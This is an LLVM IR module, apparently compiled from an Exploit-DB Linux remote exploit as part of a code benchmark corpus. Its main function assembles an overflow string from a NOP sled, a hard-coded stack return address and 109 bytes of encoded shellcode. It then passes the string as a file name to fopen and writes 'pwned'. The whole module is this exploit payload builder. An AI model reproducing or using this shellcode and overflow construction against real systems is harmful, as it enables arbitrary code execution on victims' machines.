; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_25526.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_25526.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@__const.main.scode = private unnamed_addr constant [109 x i8] c"3\C9\83\E9\EB\E8\FF\FF\FF\FF\C0^\81v\0E\99\EE0^\83\EE\FC\E2\F4\A85c\1D\CA\8424\FF\B6\A9\D7x#\B0\C8\DA\BCV6\88\B2V\0D\10\0FZ8\C1\BEa\08\10\0F\FD\DE)\88\E1\BDTnb\0C\CF\AD\B9\BF)\88\FD\DE\0A\842\07)\D1\FD\DE\D0\97\C9\EE\92\BCXq\B6\9DX6\B6\8CY0\10\0Db\0D\10\0F\FD\DE\00", align 16
@.str = private unnamed_addr constant [5 x i8] c"u\FB\FF\BF\00", align 1
@.str.1 = private unnamed_addr constant [3 x i8] c"w+\00", align 1
@.str.2 = private unnamed_addr constant [20 x i8] c"error opening file\0A\00", align 1
@.str.3 = private unnamed_addr constant [7 x i8] c"pwned\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32*, align 8
  %2 = alloca [109 x i8], align 16
  %3 = alloca [1024 x i8], align 16
  %4 = bitcast [109 x i8]* %2 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 16 %4, i8* align 16 getelementptr inbounds ([109 x i8], [109 x i8]* @__const.main.scode, i32 0, i32 0), i64 109, i1 false)
  %5 = getelementptr inbounds [1024 x i8], [1024 x i8]* %3, i64 0, i64 0
  %6 = call i32 @memset(i8* %5, i8 signext 0, i32 1024)
  %7 = getelementptr inbounds [1024 x i8], [1024 x i8]* %3, i64 0, i64 0
  %8 = call i32 @memset(i8* %7, i8 signext -112, i32 94)
  %9 = getelementptr inbounds [1024 x i8], [1024 x i8]* %3, i64 0, i64 0
  %10 = getelementptr inbounds i8, i8* %9, i64 94
  %11 = call i32 (i8*, ...) @strcat(i8* %10, i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str, i64 0, i64 0))
  %12 = getelementptr inbounds [1024 x i8], [1024 x i8]* %3, i64 0, i64 0
  %13 = getelementptr inbounds i8, i8* %12, i64 98
  %14 = call i32 (i8*, ...) @strcat(i8* %13, i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str, i64 0, i64 0))
  %15 = getelementptr inbounds [1024 x i8], [1024 x i8]* %3, i64 0, i64 0
  %16 = getelementptr inbounds i8, i8* %15, i64 102
  %17 = call i32 @memset(i8* %16, i8 signext -112, i32 40)
  %18 = getelementptr inbounds [1024 x i8], [1024 x i8]* %3, i64 0, i64 0
  %19 = getelementptr inbounds i8, i8* %18, i64 142
  %20 = getelementptr inbounds [109 x i8], [109 x i8]* %2, i64 0, i64 0
  %21 = call i32 (i8*, ...) @strcat(i8* %19, i8* %20)
  %22 = getelementptr inbounds [1024 x i8], [1024 x i8]* %3, i64 0, i64 0
  %23 = call i32* @fopen(i8* %22, i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.1, i64 0, i64 0))
  store i32* %23, i32** %1, align 8
  %24 = icmp ne i32* %23, null
  br i1 %24, label %28, label %25

25:                                               ; preds = %0
  %26 = call i32 @printf(i8* getelementptr inbounds ([20 x i8], [20 x i8]* @.str.2, i64 0, i64 0))
  %27 = call i32 @exit(i32 1) #4
  unreachable

28:                                               ; preds = %0
  %29 = load i32*, i32** %1, align 8
  %30 = call i32 @fprintf(i32* %29, i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.3, i64 0, i64 0))
  %31 = load i32*, i32** %1, align 8
  %32 = call i32 @fclose(i32* %31)
  ret i32 0
}

; Function Attrs: argmemonly nounwind willreturn
declare void @llvm.memcpy.p0i8.p0i8.i64(i8* noalias nocapture writeonly, i8* noalias nocapture readonly, i64, i1 immarg) #1

declare dso_local i32 @memset(i8*, i8 signext, i32) #2

declare dso_local i32 @strcat(i8*, ...) #2

declare dso_local i32* @fopen(i8*, i8*) #2

declare dso_local i32 @printf(i8*) #2

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #3

declare dso_local i32 @fprintf(i32*, i8*) #2

declare dso_local i32 @fclose(i32*) #2


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
